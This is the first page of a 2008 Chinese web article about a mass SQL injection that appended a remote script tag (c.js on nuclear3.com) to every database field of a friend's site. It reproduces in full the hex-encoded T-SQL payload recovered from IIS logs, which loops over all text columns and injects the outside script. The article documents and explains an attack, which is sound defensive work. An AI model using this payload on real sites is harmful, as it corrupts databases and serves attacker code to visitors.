WEB开发网
开发学院网络安全安全技术 关于注入(css/c.js) 阅读

关于注入(css/c.js)

 2008-12-30 13:46:19 来源:WEB开发网   
核心提示:这几天朋友的网站天天被搞破坏的人恶意注入,也许是程序没写好的原因,关于注入(css/c.js),数据库每个字段加了一段script(<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>,而这个script地址时不时的有变化),用一些搜索

这几天朋友的网站天天被搞破坏的人恶意注入,也许是程序没写好的原因,数据库每个字段加了一段script(<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>,而这个script地址时不时的有变化)。用一些搜索引擎搜索下:/css/c.js></Script>,发现好多网站居然都有这个问题。通过iis日志捕捉到注入的原型是以下形式:

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt
  
(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000
  
4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620
  
06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063
  
007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F006
  
2006A006500630074007300200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200
  
6500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D002700750
  
02700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E005800740079
  
00700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002
  
E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F00430075007200
  
73006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C00650
  
05F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040
  
004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078006
  
50063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B002700
  
2B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007200740028005600610072006300680
  
0610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C005300630072
  
0069007000740020005300720063003D0068007400740070003A002F002F0063002E006E00750063006C0065006100720033002
  
E0063002500360046002500360044002F006300730073002F0063002E006A0073003E003C002F00530063007200690070007400
  
3E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0
  
065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C
  
006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007
  
400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--

1 2  下一页

Tags:关于 注入 css

编辑录入:爽爽 [复制链接] [打 印]
更多精彩
赞助商链接

热点阅读
焦点图片
最新推荐
精彩阅读